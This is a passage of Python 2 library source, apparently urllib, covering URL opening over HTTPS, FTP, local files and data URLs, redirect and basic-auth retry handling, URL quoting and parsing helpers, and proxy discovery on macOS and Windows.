raise IOError, ('https error', 'no host given') if proxy_passwd: import base64 proxy_auth = base64.b64encode(proxy_passwd).strip() else: proxy_auth = None if user_passwd: import base64 auth = base64.b64encode(user_passwd).strip() else: auth = None h = httplib.HTTPS(host, 0, key_file=self.key_file, cert_file=self.cert_file) if data is not None: h.putrequest('POST', selector) h.putheader('Content-Type', 'application/x-www-form-urlencoded') h.putheader('Content-Length', '%d' % len(data)) else: h.putrequest('GET', selector) if proxy_auth: h.putheader('Proxy-Authorization', 'Basic %s' % proxy_auth) if auth: h.putheader('Authorization', 'Basic %s' % auth) if realhost: h.putheader('Host', realhost) for args in self.addheaders: h.putheader(*args) h.endheaders() if data is not None: h.send(data) errcode, errmsg, headers = h.getreply() fp = h.getfile() if errcode == -1: if fp: fp.close() # something went wrong with the HTTP status line raise IOError, ('http protocol error', 0, 'got a bad status line', None) # According to RFC 2616, "2xx" code indicates that the client's # request was successfully received, understood, and accepted. if (200 <= errcode < 300): return addinfourl(fp, headers, "https:" + url, errcode) else: if data is None: return self.http_error(url, fp, errcode, errmsg, headers) else: return self.http_error(url, fp, errcode, errmsg, headers, data) def open_file(self, url): """Use local file or FTP depending on form of URL.""" if not isinstance(url, str): raise IOError, ('file error', 'proxy support for file protocol currently not implemented') if url[:2] == '//' and url[2:3] != '/' and url[2:12].lower() != 'localhost/': return self.open_ftp(url) else: return self.open_local_file(url) def open_local_file(self, url): """Use local file.""" import mimetypes, mimetools, email.utils try: from cStringIO import StringIO except ImportError: from StringIO import StringIO host, file = splithost(url) localname = url2pathname(file) try: stats = os.stat(localname) except OSError, e: raise IOError(e.errno, e.strerror, e.filename) size = stats.st_size modified = email.utils.formatdate(stats.st_mtime, usegmt=True) mtype = mimetypes.guess_type(url)[0] headers = mimetools.Message(StringIO( 'Content-Type: %s\nContent-Length: %d\nLast-modified: %s\n' % (mtype or 'text/plain', size, modified))) if not host: urlfile = file if file[:1] == '/': urlfile = 'file://' + file return addinfourl(open(localname, 'rb'), headers, urlfile) host, port = splitport(host) if not port \ and socket.gethostbyname(host) in (localhost(), thishost()): urlfile = file if file[:1] == '/': urlfile = 'file://' + file return addinfourl(open(localname, 'rb'), headers, urlfile) raise IOError, ('local file error', 'not on local host') def open_ftp(self, url): """Use FTP protocol.""" if not isinstance(url, str): raise IOError, ('ftp error', 'proxy support for ftp protocol currently not implemented') import mimetypes, mimetools try: from cStringIO import StringIO except ImportError: from StringIO import StringIO host, path = splithost(url) if not host: raise IOError, ('ftp error', 'no host given') host, port = splitport(host) user, host = splituser(host) if user: user, passwd = splitpasswd(user) else: passwd = None host = unquote(host) user = unquote(user or '') passwd = unquote(passwd or '') host = socket.gethostbyname(host) if not port: import ftplib port = ftplib.FTP_PORT else: port = int(port) path, attrs = splitattr(path) path = unquote(path) dirs = path.split('/') dirs, file = dirs[:-1], dirs[-1] if dirs and not dirs[0]: dirs = dirs[1:] if dirs and not dirs[0]: dirs[0] = '/' key = user, host, port, '/'.join(dirs) # XXX thread unsafe! if len(self.ftpcache) > MAXFTPCACHE: # Prune the cache, rather arbitrarily for k in self.ftpcache.keys(): if k != key: v = self.ftpcache[k] del self.ftpcache[k] v.close() try: if not key in self.ftpcache: self.ftpcache[key] = \ ftpwrapper(user, passwd, host, port, dirs) if not file: type = 'D' else: type = 'I' for attr in attrs: attr, value = splitvalue(attr) if attr.lower() == 'type' and \ value in ('a', 'A', 'i', 'I', 'd', 'D'): type = value.upper() (fp, retrlen) = self.ftpcache[key].retrfile(file, type) mtype = mimetypes.guess_type("ftp:" + url)[0] headers = "" if mtype: headers += "Content-Type: %s\n" % mtype if retrlen is not None and retrlen >= 0: headers += "Content-Length: %d\n" % retrlen headers = mimetools.Message(StringIO(headers)) return addinfourl(fp, headers, "ftp:" + url) except ftperrors(), msg: raise IOError, ('ftp error', msg), sys.exc_info()[2] def open_data(self, url, data=None): """Use "data" URL.""" if not isinstance(url, str): raise IOError, ('data error', 'proxy support for data protocol currently not implemented') # ignore POSTed data # # syntax of data URLs: # dataurl := "data:" [ mediatype ] [ ";base64" ] "," data # mediatype := [ type "/" subtype ] *( ";" parameter ) # data := *urlchar # parameter := attribute "=" value import mimetools try: from cStringIO import StringIO except ImportError: from StringIO import StringIO try: [type, data] = url.split(',', 1) except ValueError: raise IOError, ('data error', 'bad data URL') if not type: type = 'text/plain;charset=US-ASCII' semi = type.rfind(';') if semi >= 0 and '=' not in type[semi:]: encoding = type[semi+1:] type = type[:semi] else: encoding = '' msg = [] msg.append('Date: %s'%time.strftime('%a, %d %b %Y %T GMT', time.gmtime(time.time()))) msg.append('Content-type: %s' % type) if encoding == 'base64': import base64 data = base64.decodestring(data) else: data = unquote(data) msg.append('Content-Length: %d' % len(data)) msg.append('') msg.append(data) msg = '\n'.join(msg) f = StringIO(msg) headers = mimetools.Message(f, 0) #f.fileno = None # needed for addinfourl return addinfourl(f, headers, url) class FancyURLopener(URLopener): """Derived class with handlers for errors we can handle (perhaps).""" def __init__(self, *args, **kwargs): URLopener.__init__(self, *args, **kwargs) self.auth_cache = {} self.tries = 0 self.maxtries = 10 def http_error_default(self, url, fp, errcode, errmsg, headers): """Default error handling -- don't raise an exception.""" return addinfourl(fp, headers, "http:" + url, errcode) def http_error_302(self, url, fp, errcode, errmsg, headers, data=None): """Error 302 -- relocated (temporarily).""" self.tries += 1 if self.maxtries and self.tries >= self.maxtries: if hasattr(self, "http_error_500"): meth = self.http_error_500 else: meth = self.http_error_default self.tries = 0 return meth(url, fp, 500, "Internal Server Error: Redirect Recursion", headers) result = self.redirect_internal(url, fp, errcode, errmsg, headers, data) self.tries = 0 return result def redirect_internal(self, url, fp, errcode, errmsg, headers, data): if 'location' in headers: newurl = headers['location'] elif 'uri' in headers: newurl = headers['uri'] else: return void = fp.read() fp.close() # In case the server sent a relative URL, join with original: newurl = basejoin(self.type + ":" + url, newurl) return self.open(newurl) def http_error_301(self, url, fp, errcode, errmsg, headers, data=None): """Error 301 -- also relocated (permanently).""" return self.http_error_302(url, fp, errcode, errmsg, headers, data) def http_error_303(self, url, fp, errcode, errmsg, headers, data=None): """Error 303 -- also relocated (essentially identical to 302).""" return self.http_error_302(url, fp, errcode, errmsg, headers, data) def http_error_307(self, url, fp, errcode, errmsg, headers, data=None): """Error 307 -- relocated, but turn POST into error.""" if data is None: return self.http_error_302(url, fp, errcode, errmsg, headers, data) else: return self.http_error_default(url, fp, errcode, errmsg, headers) def http_error_401(self, url, fp, errcode, errmsg, headers, data=None): """Error 401 -- authentication required. This function supports Basic authentication only.""" if not 'www-authenticate' in headers: URLopener.http_error_default(self, url, fp, errcode, errmsg, headers) stuff = headers['www-authenticate'] import re match = re.match('[ \t]*([^ \t]+)[ \t]+realm="([^"]*)"', stuff) if not match: URLopener.http_error_default(self, url, fp, errcode, errmsg, headers) scheme, realm = match.groups() if scheme.lower() != 'basic': URLopener.http_error_default(self, url, fp, errcode, errmsg, headers) name = 'retry_' + self.type + '_basic_auth' if data is None: return getattr(self,name)(url, realm) else: return getattr(self,name)(url, realm, data) def http_error_407(self, url, fp, errcode, errmsg, headers, data=None): """Error 407 -- proxy authentication required. This function supports Basic authentication only.""" if not 'proxy-authenticate' in headers: URLopener.http_error_default(self, url, fp, errcode, errmsg, headers) stuff = headers['proxy-authenticate'] import re match = re.match('[ \t]*([^ \t]+)[ \t]+realm="([^"]*)"', stuff) if not match: URLopener.http_error_default(self, url, fp, errcode, errmsg, headers) scheme, realm = match.groups() if scheme.lower() != 'basic': URLopener.http_error_default(self, url, fp, errcode, errmsg, headers) name = 'retry_proxy_' + self.type + '_basic_auth' if data is None: return getattr(self,name)(url, realm) else: return getattr(self,name)(url, realm, data) def retry_proxy_http_basic_auth(self, url, realm, data=None): host, selector = splithost(url) newurl = 'http://' + host + selector proxy = self.proxies['http'] urltype, proxyhost = splittype(proxy) proxyhost, proxyselector = splithost(proxyhost) i = proxyhost.find('@') + 1 proxyhost = proxyhost[i:] user, passwd = self.get_user_passwd(proxyhost, realm, i) if not (user or passwd): return None proxyhost = quote(user, safe='') + ':' + quote(passwd, safe='') + '@' + proxyhost self.proxies['http'] = 'http://' + proxyhost + proxyselector if data is None: return self.open(newurl) else: return self.open(newurl, data) def retry_proxy_https_basic_auth(self, url, realm, data=None): host, selector = splithost(url) newurl = 'https://' + host + selector proxy = self.proxies['https'] urltype, proxyhost = splittype(proxy) proxyhost, proxyselector = splithost(proxyhost) i = proxyhost.find('@') + 1 proxyhost = proxyhost[i:] user, passwd = self.get_user_passwd(proxyhost, realm, i) if not (user or passwd): return None proxyhost = quote(user, safe='') + ':' + quote(passwd, safe='') + '@' + proxyhost self.proxies['https'] = 'https://' + proxyhost + proxyselector if data is None: return self.open(newurl) else: return self.open(newurl, data) def retry_http_basic_auth(self, url, realm, data=None): host, selector = splithost(url) i = host.find('@') + 1 host = host[i:] user, passwd = self.get_user_passwd(host, realm, i) if not (user or passwd): return None host = quote(user, safe='') + ':' + quote(passwd, safe='') + '@' + host newurl = 'http://' + host + selector if data is None: return self.open(newurl) else: return self.open(newurl, data) def retry_https_basic_auth(self, url, realm, data=None): host, selector = splithost(url) i = host.find('@') + 1 host = host[i:] user, passwd = self.get_user_passwd(host, realm, i) if not (user or passwd): return None host = quote(user, safe='') + ':' + quote(passwd, safe='') + '@' + host newurl = 'https://' + host + selector if data is None: return self.open(newurl) else: return self.open(newurl, data) def get_user_passwd(self, host, realm, clear_cache = 0): key = realm + '@' + host.lower() if key in self.auth_cache: if clear_cache: del self.auth_cache[key] else: return self.auth_cache[key] user, passwd = self.prompt_user_passwd(host, realm) if user or passwd: self.auth_cache[key] = (user, passwd) return user, passwd def prompt_user_passwd(self, host, realm): """Override this in a GUI environment!""" import getpass try: user = raw_input("Enter username for %s at %s: " % (realm, host)) passwd = getpass.getpass("Enter password for %s in %s at %s: " % (user, realm, host)) return user, passwd except KeyboardInterrupt: print return None, None # Utility functions _localhost = None def localhost(): """Return the IP address of the magic hostname 'localhost'.""" global _localhost if _localhost is None: _localhost = socket.gethostbyname('localhost') return _localhost _thishost = None def thishost(): """Return the IP address of the current host.""" global _thishost if _thishost is None: _thishost = socket.gethostbyname(socket.gethostname()) return _thishost _ftperrors = None def ftperrors(): """Return the set of errors raised by the FTP class.""" global _ftperrors if _ftperrors is None: import ftplib _ftperrors = ftplib.all_errors return _ftperrors _noheaders = None def noheaders(): """Return an empty mimetools.Message object.""" global _noheaders if _noheaders is None: import mimetools try: from cStringIO import StringIO except ImportError: from StringIO import StringIO _noheaders = mimetools.Message(StringIO(), 0) _noheaders.fp.close() # Recycle file descriptor return _noheaders # Utility classes class ftpwrapper: """Class used by open_ftp() for cache of open FTP connections.""" def __init__(self, user, passwd, host, port, dirs, timeout=socket._GLOBAL_DEFAULT_TIMEOUT): self.user = user self.passwd = passwd self.host = host self.port = port self.dirs = dirs self.timeout = timeout self.init() def init(self): import ftplib self.busy = 0 self.ftp = ftplib.FTP() self.ftp.connect(self.host, self.port, self.timeout) self.ftp.login(self.user, self.passwd) for dir in self.dirs: self.ftp.cwd(dir) def retrfile(self, file, type): import ftplib self.endtransfer() if type in ('d', 'D'): cmd = 'TYPE A'; isdir = 1 else: cmd = 'TYPE ' + type; isdir = 0 try: self.ftp.voidcmd(cmd) except ftplib.all_errors: self.init() self.ftp.voidcmd(cmd) conn = None if file and not isdir: # Try to retrieve as a file try: cmd = 'RETR ' + file conn = self.ftp.ntransfercmd(cmd) except ftplib.error_perm, reason: if str(reason)[:3] != '550': raise IOError, ('ftp error', reason), sys.exc_info()[2] if not conn: # Set transfer mode to ASCII! self.ftp.voidcmd('TYPE A') # Try a directory listing. Verify that directory exists. if file: pwd = self.ftp.pwd() try: try: self.ftp.cwd(file) except ftplib.error_perm, reason: raise IOError, ('ftp error', reason), sys.exc_info()[2] finally: self.ftp.cwd(pwd) cmd = 'LIST ' + file else: cmd = 'LIST' conn = self.ftp.ntransfercmd(cmd) self.busy = 1 # Pass back both a suitably decorated object and a retrieval length return (addclosehook(conn[0].makefile('rb'), self.endtransfer), conn[1]) def endtransfer(self): if not self.busy: return self.busy = 0 try: self.ftp.voidresp() except ftperrors(): pass def close(self): self.endtransfer() try: self.ftp.close() except ftperrors(): pass class addbase: """Base class for addinfo and addclosehook.""" def __init__(self, fp): self.fp = fp self.read = self.fp.read self.readline = self.fp.readline if hasattr(self.fp, "readlines"): self.readlines = self.fp.readlines if hasattr(self.fp, "fileno"): self.fileno = self.fp.fileno else: self.fileno = lambda: None if hasattr(self.fp, "__iter__"): self.__iter__ = self.fp.__iter__ if hasattr(self.fp, "next"): self.next = self.fp.next def __repr__(self): return '<%s at %r whose fp = %r>' % (self.__class__.__name__, id(self), self.fp) def close(self): self.read = None self.readline = None self.readlines = None self.fileno = None if self.fp: self.fp.close() self.fp = None class addclosehook(addbase): """Class to add a close hook to an open file.""" def __init__(self, fp, closehook, *hookargs): addbase.__init__(self, fp) self.closehook = closehook self.hookargs = hookargs def close(self): addbase.close(self) if self.closehook: self.closehook(*self.hookargs) self.closehook = None self.hookargs = None class addinfo(addbase): """class to add an info() method to an open file.""" def __init__(self, fp, headers): addbase.__init__(self, fp) self.headers = headers def info(self): return self.headers class addinfourl(addbase): """class to add info() and geturl() methods to an open file.""" def __init__(self, fp, headers, url, code=None): addbase.__init__(self, fp) self.headers = headers self.url = url self.code = code def info(self): return self.headers def getcode(self): return self.code def geturl(self): return self.url # Utilities to parse URLs (most of these return None for missing parts): # unwrap('<URL:type://host/path>') --> 'type://host/path' # splittype('type:opaquestring') --> 'type', 'opaquestring' # splithost('//host[:port]/path') --> 'host[:port]', '/path' # splituser('user[:passwd]@host[:port]') --> 'user[:passwd]', 'host[:port]' # splitpasswd('user:passwd') -> 'user', 'passwd' # splitport('host:port') --> 'host', 'port' # splitquery('/path?query') --> '/path', 'query' # splittag('/path#tag') --> '/path', 'tag' # splitattr('/path;attr1=value1;attr2=value2;...') -> # '/path', ['attr1=value1', 'attr2=value2', ...] # splitvalue('attr=value') --> 'attr', 'value' # unquote('abc%20def') -> 'abc def' # quote('abc def') -> 'abc%20def') try: unicode except NameError: def _is_unicode(x): return 0 else: def _is_unicode(x): return isinstance(x, unicode) def toBytes(url): """toBytes(u"URL") --> 'URL'.""" # Most URL schemes require ASCII. If that changes, the conversion # can be relaxed if _is_unicode(url): try: url = url.encode("ASCII") except UnicodeError: raise UnicodeError("URL " + repr(url) + " contains non-ASCII characters") return url def unwrap(url): """unwrap('<URL:type://host/path>') --> 'type://host/path'.""" url = url.strip() if url[:1] == '<' and url[-1:] == '>': url = url[1:-1].strip() if url[:4] == 'URL:': url = url[4:].strip() return url _typeprog = None def splittype(url): """splittype('type:opaquestring') --> 'type', 'opaquestring'.""" global _typeprog if _typeprog is None: import re _typeprog = re.compile('^([^/:]+):') match = _typeprog.match(url) if match: scheme = match.group(1) return scheme.lower(), url[len(scheme) + 1:] return None, url _hostprog = None def splithost(url): """splithost('//host[:port]/path') --> 'host[:port]', '/path'.""" global _hostprog if _hostprog is None: import re _hostprog = re.compile('^//([^/?]*)(.*)$') match = _hostprog.match(url) if match: return match.group(1, 2) return None, url _userprog = None def splituser(host): """splituser('user[:passwd]@host[:port]') --> 'user[:passwd]', 'host[:port]'.""" global _userprog if _userprog is None: import re _userprog = re.compile('^(.*)@(.*)$') match = _userprog.match(host) if match: return map(unquote, match.group(1, 2)) return None, host _passwdprog = None def splitpasswd(user): """splitpasswd('user:passwd') -> 'user', 'passwd'.""" global _passwdprog if _passwdprog is None: import re _passwdprog = re.compile('^([^:]*):(.*)$') match = _passwdprog.match(user) if match: return match.group(1, 2) return user, None # splittag('/path#tag') --> '/path', 'tag' _portprog = None def splitport(host): """splitport('host:port') --> 'host', 'port'.""" global _portprog if _portprog is None: import re _portprog = re.compile('^(.*):([0-9]+)$') match = _portprog.match(host) if match: return match.group(1, 2) return host, None _nportprog = None def splitnport(host, defport=-1): """Split host and port, returning numeric port. Return given default port if no ':' found; defaults to -1. Return numerical port if a valid number are found after ':'. Return None if ':' but not a valid number.""" global _nportprog if _nportprog is None: import re _nportprog = re.compile('^(.*):(.*)$') match = _nportprog.match(host) if match: host, port = match.group(1, 2) try: if not port: raise ValueError, "no digits" nport = int(port) except ValueError: nport = None return host, nport return host, defport _queryprog = None def splitquery(url): """splitquery('/path?query') --> '/path', 'query'.""" global _queryprog if _queryprog is None: import re _queryprog = re.compile('^(.*)\?([^?]*)$') match = _queryprog.match(url) if match: return match.group(1, 2) return url, None _tagprog = None def splittag(url): """splittag('/path#tag') --> '/path', 'tag'.""" global _tagprog if _tagprog is None: import re _tagprog = re.compile('^(.*)#([^#]*)$') match = _tagprog.match(url) if match: return match.group(1, 2) return url, None def splitattr(url): """splitattr('/path;attr1=value1;attr2=value2;...') -> '/path', ['attr1=value1', 'attr2=value2', ...].""" words = url.split(';') return words[0], words[1:] _valueprog = None def splitvalue(attr): """splitvalue('attr=value') --> 'attr', 'value'.""" global _valueprog if _valueprog is None: import re _valueprog = re.compile('^([^=]*)=(.*)$') match = _valueprog.match(attr) if match: return match.group(1, 2) return attr, None _hextochr = dict(('%02x' % i, chr(i)) for i in range(256)) _hextochr.update(('%02X' % i, chr(i)) for i in range(256)) def unquote(s): """unquote('abc%20def') -> 'abc def'.""" res = s.split('%') for i in xrange(1, len(res)): item = res[i] try: res[i] = _hextochr[item[:2]] + item[2:] except KeyError: res[i] = '%' + item except UnicodeDecodeError: res[i] = unichr(int(item[:2], 16)) + item[2:] return "".join(res) def unquote_plus(s): """unquote('%7e/abc+def') -> '~/abc def'""" s = s.replace('+', ' ') return unquote(s) always_safe = ('ABCDEFGHIJKLMNOPQRSTUVWXYZ' 'abcdefghijklmnopqrstuvwxyz' '0123456789' '_.-') _safemaps = {} def quote(s, safe = '/'): """quote('abc def') -> 'abc%20def' Each part of a URL, e.g. the path info, the query, etc., has a different set of reserved characters that must be quoted. RFC 2396 Uniform Resource Identifiers (URI): Generic Syntax lists the following reserved characters. reserved = ";" | "/" | "?" | ":" | "@" | "&" | "=" | "+" | "$" | "," Each of these characters is reserved in some component of a URL, but not necessarily in all of them. By default, the quote function is intended for quoting the path section of a URL. Thus, it will not encode '/'. This character is reserved, but in typical usage the quote function is being called on a path where the existing slash characters are used as reserved characters. """ cachekey = (safe, always_safe) try: safe_map = _safemaps[cachekey] except KeyError: safe += always_safe safe_map = {} for i in range(256): c = chr(i) safe_map[c] = (c in safe) and c or ('%%%02X' % i) _safemaps[cachekey] = safe_map res = map(safe_map.__getitem__, s) return ''.join(res) def quote_plus(s, safe = ''): """Quote the query fragment of a URL; replacing ' ' with '+'""" if ' ' in s: s = quote(s, safe + ' ') return s.replace(' ', '+') return quote(s, safe) def urlencode(query,doseq=0): """Encode a sequence of two-element tuples or dictionary into a URL query string. If any values in the query arg are sequences and doseq is true, each sequence element is converted to a separate parameter. If the query arg is a sequence of two-element tuples, the order of the parameters in the output will match the order of parameters in the input. """ if hasattr(query,"items"): # mapping objects query = query.items() else: # it's a bother at times that strings and string-like objects are # sequences... try: # non-sequence items should not work with len() # non-empty strings will fail this if len(query) and not isinstance(query[0], tuple): raise TypeError # zero-length sequences of all types will get here and succeed, # but that's a minor nit - since the original implementation # allowed empty dicts that type of behavior probably should be # preserved for consistency except TypeError: ty,va,tb = sys.exc_info() raise TypeError, "not a valid non-string sequence or mapping object", tb l = [] if not doseq: # preserve old behavior for k, v in query: k = quote_plus(str(k)) v = quote_plus(str(v)) l.append(k + '=' + v) else: for k, v in query: k = quote_plus(str(k)) if isinstance(v, str): v = quote_plus(v) l.append(k + '=' + v) elif _is_unicode(v): # is there a reasonable way to convert to ASCII? # encode generates a string, but "replace" or "ignore" # lose information and "strict" can raise UnicodeError v = quote_plus(v.encode("ASCII","replace")) l.append(k + '=' + v) else: try: # is this a sufficient test for sequence-ness? x = len(v) except TypeError: # not a sequence v = quote_plus(str(v)) l.append(k + '=' + v) else: # loop over the sequence for elt in v: l.append(k + '=' + quote_plus(str(elt))) return '&'.join(l) # Proxy handling def getproxies_environment(): """Return a dictionary of scheme -> proxy server URL mappings. Scan the environment for variables named <scheme>_proxy; this seems to be the standard convention. If you need a different way, you can pass a proxies dictionary to the [Fancy]URLopener constructor. """ proxies = {} for name, value in os.environ.items(): name = name.lower() if value and name[-6:] == '_proxy': proxies[name[:-6]] = value return proxies def proxy_bypass_environment(host): """Test if proxies should not be used for a particular host. Checks the environment for a variable named no_proxy, which should be a list of DNS suffixes separated by commas, or '*' for all hosts. """ no_proxy = os.environ.get('no_proxy', '') or os.environ.get('NO_PROXY', '') # '*' is special case for always bypass if no_proxy == '*': return 1 # strip port off host hostonly, port = splitport(host) # check if the host ends with any of the DNS suffixes for name in no_proxy.split(','): if name and (hostonly.endswith(name) or host.endswith(name)): return 1 # otherwise, don't bypass return 0 if sys.platform == 'darwin': def _CFSetup(sc): from ctypes import c_int32, c_void_p, c_char_p, c_int sc.CFStringCreateWithCString.argtypes = [ c_void_p, c_char_p, c_int32 ] sc.CFStringCreateWithCString.restype = c_void_p sc.SCDynamicStoreCopyProxies.argtypes = [ c_void_p ] sc.SCDynamicStoreCopyProxies.restype = c_void_p sc.CFDictionaryGetValue.argtypes = [ c_void_p, c_void_p ] sc.CFDictionaryGetValue.restype = c_void_p sc.CFStringGetLength.argtypes = [ c_void_p ] sc.CFStringGetLength.restype = c_int32 sc.CFStringGetCString.argtypes = [ c_void_p, c_char_p, c_int32, c_int32 ] sc.CFStringGetCString.restype = c_int32 sc.CFNumberGetValue.argtypes = [ c_void_p, c_int, c_void_p ] sc.CFNumberGetValue.restype = c_int32 sc.CFRelease.argtypes = [ c_void_p ] sc.CFRelease.restype = None def _CStringFromCFString(sc, value): from ctypes import create_string_buffer length = sc.CFStringGetLength(value) + 1 buff = create_string_buffer(length) sc.CFStringGetCString(value, buff, length, 0) return buff.value def _CFNumberToInt32(sc, cfnum): from ctypes import byref, c_int val = c_int() kCFNumberSInt32Type = 3 sc.CFNumberGetValue(cfnum, kCFNumberSInt32Type, byref(val)) return val.value def proxy_bypass_macosx_sysconf(host): """ Return True iff this host shouldn't be accessed using a proxy This function uses the MacOSX framework SystemConfiguration to fetch the proxy information. """ from ctypes import cdll from ctypes.util import find_library import re import socket from fnmatch import fnmatch def ip2num(ipAddr): parts = ipAddr.split('.') parts = map(int, parts) if len(parts) != 4: parts = (parts + [0, 0, 0, 0])[:4] return (parts[0] << 24) | (parts[1] << 16) | (parts[2] << 8) | parts[3] sc = cdll.LoadLibrary(find_library("SystemConfiguration")) _CFSetup(sc) hostIP = None if not sc: return False kSCPropNetProxiesExceptionsList = sc.CFStringCreateWithCString(0, "ExceptionsList", 0) kSCPropNetProxiesExcludeSimpleHostnames = sc.CFStringCreateWithCString(0, "ExcludeSimpleHostnames", 0) proxyDict = sc.SCDynamicStoreCopyProxies(None) if proxyDict is None: return False try: # Check for simple host names: if '.' not in host: exclude_simple = sc.CFDictionaryGetValue(proxyDict, kSCPropNetProxiesExcludeSimpleHostnames) if exclude_simple and _CFNumberToInt32(sc, exclude_simple): return True # Check the exceptions list: exceptions = sc.CFDictionaryGetValue(proxyDict, kSCPropNetProxiesExceptionsList) if exceptions: # Items in the list are strings like these: *.local, 169.254/16 for index in xrange(sc.CFArrayGetCount(exceptions)): value = sc.CFArrayGetValueAtIndex(exceptions, index) if not value: continue value = _CStringFromCFString(sc, value) m = re.match(r"(\d+(?:\.\d+)*)(/\d+)?", value) if m is not None: if hostIP is None: hostIP = socket.gethostbyname(host) hostIP = ip2num(hostIP) base = ip2num(m.group(1)) mask = int(m.group(2)[1:]) mask = 32 - mask if (hostIP >> mask) == (base >> mask): return True elif fnmatch(host, value): return True return False finally: sc.CFRelease(kSCPropNetProxiesExceptionsList) sc.CFRelease(kSCPropNetProxiesExcludeSimpleHostnames) def getproxies_macosx_sysconf(): """Return a dictionary of scheme -> proxy server URL mappings. This function uses the MacOSX framework SystemConfiguration to fetch the proxy information. """ from ctypes import cdll from ctypes.util import find_library sc = cdll.LoadLibrary(find_library("SystemConfiguration")) _CFSetup(sc) if not sc: return {} kSCPropNetProxiesHTTPEnable = sc.CFStringCreateWithCString(0, "HTTPEnable", 0) kSCPropNetProxiesHTTPProxy = sc.CFStringCreateWithCString(0, "HTTPProxy", 0) kSCPropNetProxiesHTTPPort = sc.CFStringCreateWithCString(0, "HTTPPort", 0) kSCPropNetProxiesHTTPSEnable = sc.CFStringCreateWithCString(0, "HTTPSEnable", 0) kSCPropNetProxiesHTTPSProxy = sc.CFStringCreateWithCString(0, "HTTPSProxy", 0) kSCPropNetProxiesHTTPSPort = sc.CFStringCreateWithCString(0, "HTTPSPort", 0) kSCPropNetProxiesFTPEnable = sc.CFStringCreateWithCString(0, "FTPEnable", 0) kSCPropNetProxiesFTPPassive = sc.CFStringCreateWithCString(0, "FTPPassive", 0) kSCPropNetProxiesFTPPort = sc.CFStringCreateWithCString(0, "FTPPort", 0) kSCPropNetProxiesFTPProxy = sc.CFStringCreateWithCString(0, "FTPProxy", 0) kSCPropNetProxiesGopherEnable = sc.CFStringCreateWithCString(0, "GopherEnable", 0) kSCPropNetProxiesGopherPort = sc.CFStringCreateWithCString(0, "GopherPort", 0) kSCPropNetProxiesGopherProxy = sc.CFStringCreateWithCString(0, "GopherProxy", 0) proxies = {} proxyDict = sc.SCDynamicStoreCopyProxies(None) try: # HTTP: enabled = sc.CFDictionaryGetValue(proxyDict, kSCPropNetProxiesHTTPEnable) if enabled and _CFNumberToInt32(sc, enabled): proxy = sc.CFDictionaryGetValue(proxyDict, kSCPropNetProxiesHTTPProxy) port = sc.CFDictionaryGetValue(proxyDict, kSCPropNetProxiesHTTPPort) if proxy: proxy = _CStringFromCFString(sc, proxy) if port: port = _CFNumberToInt32(sc, port) proxies["http"] = "http://%s:%i" % (proxy, port) else: proxies["http"] = "http://%s" % (proxy, ) # HTTPS: enabled = sc.CFDictionaryGetValue(proxyDict, kSCPropNetProxiesHTTPSEnable) if enabled and _CFNumberToInt32(sc, enabled): proxy = sc.CFDictionaryGetValue(proxyDict, kSCPropNetProxiesHTTPSProxy) port = sc.CFDictionaryGetValue(proxyDict, kSCPropNetProxiesHTTPSPort) if proxy: proxy = _CStringFromCFString(sc, proxy) if port: port = _CFNumberToInt32(sc, port) proxies["https"] = "http://%s:%i" % (proxy, port) else: proxies["https"] = "http://%s" % (proxy, ) # FTP: enabled = sc.CFDictionaryGetValue(proxyDict, kSCPropNetProxiesFTPEnable) if enabled and _CFNumberToInt32(sc, enabled): proxy = sc.CFDictionaryGetValue(proxyDict, kSCPropNetProxiesFTPProxy) port = sc.CFDictionaryGetValue(proxyDict, kSCPropNetProxiesFTPPort) if proxy: proxy = _CStringFromCFString(sc, proxy) if port: port = _CFNumberToInt32(sc, port) proxies["ftp"] = "http://%s:%i" % (proxy, port) else: proxies["ftp"] = "http://%s" % (proxy, ) # Gopher: enabled = sc.CFDictionaryGetValue(proxyDict, kSCPropNetProxiesGopherEnable) if enabled and _CFNumberToInt32(sc, enabled): proxy = sc.CFDictionaryGetValue(proxyDict, kSCPropNetProxiesGopherProxy) port = sc.CFDictionaryGetValue(proxyDict, kSCPropNetProxiesGopherPort) if proxy: proxy = _CStringFromCFString(sc, proxy) if port: port = _CFNumberToInt32(sc, port) proxies["gopher"] = "http://%s:%i" % (proxy, port) else: proxies["gopher"] = "http://%s" % (proxy, ) finally: sc.CFRelease(proxyDict) sc.CFRelease(kSCPropNetProxiesHTTPEnable) sc.CFRelease(kSCPropNetProxiesHTTPProxy) sc.CFRelease(kSCPropNetProxiesHTTPPort) sc.CFRelease(kSCPropNetProxiesFTPEnable) sc.CFRelease(kSCPropNetProxiesFTPPassive) sc.CFRelease(kSCPropNetProxiesFTPPort) sc.CFRelease(kSCPropNetProxiesFTPProxy) sc.CFRelease(kSCPropNetProxiesGopherEnable) sc.CFRelease(kSCPropNetProxiesGopherPort) sc.CFRelease(kSCPropNetProxiesGopherProxy) return proxies def proxy_bypass(host): if getproxies_environment(): return proxy_bypass_environment(host) else: return proxy_bypass_macosx_sysconf(host) def getproxies(): return getproxies_environment() or getproxies_macosx_sysconf() elif os.name == 'nt': def getproxies_registry(): """Return a dictionary of scheme -> proxy server URL mappings. Win32 uses the registry to store proxies. """ proxies = {} try: import _winreg except ImportError: # Std module, so should be around - but you never know! return proxies try: internetSettings = _winreg.OpenKey(_winreg.HKEY_CURRENT_USER, r'Software\Microsoft\Windows\CurrentVersion\Internet Settings') proxyEnable = _winreg.QueryValueEx(internetSettings, 'ProxyEnable')[0] if proxyEnable: # Returned as Unicode but problems if not converted to ASCII proxyServer = str(_winreg.QueryValueEx(internetSettings, 'ProxyServer')[0]) if '=' in proxyServer: # Per-protocol settings for p in proxyServer.split(';'): protocol, address = p.split('=', 1) # See if address has a type:// prefix import re if not re.match('^([^/:]+)://', address): address = '%s://%s' % (protocol, address) proxies[protocol] = address else: # Use one setting for all protocols if proxyServer[:5] == 'http:': proxies['http'] = proxyServer else: proxies['http'] = 'http://%s' % proxyServer proxies['ftp'] = 'ftp://%s' % proxyServer internetSettings.Close() except (WindowsError, ValueError, TypeError): # Either registry key not found etc, or the value in an # unexpected format. # proxies already set up to be empty so nothing to do pass return proxies def getproxies(): """Return a dictionary of scheme -> proxy server URL mappings. Returns settings gathered from the environment, if specified, or the registry. """ return getproxies_environment() or getproxies_registry() def proxy_bypass_registry(host): try: import _winreg import re except ImportError: # Std modules, so should be around - but you never know! return 0 try: internetSettings = _winreg.OpenKey(_winreg.HKEY_CURRENT_USER, r'Software\Microsoft\Windows\CurrentVersion\Internet Settings') proxyEnable = _winreg.QueryValueEx(internetSettings, 'ProxyEnable')[0] proxyOverride = str(_winreg.QueryValueEx(internetSettings, 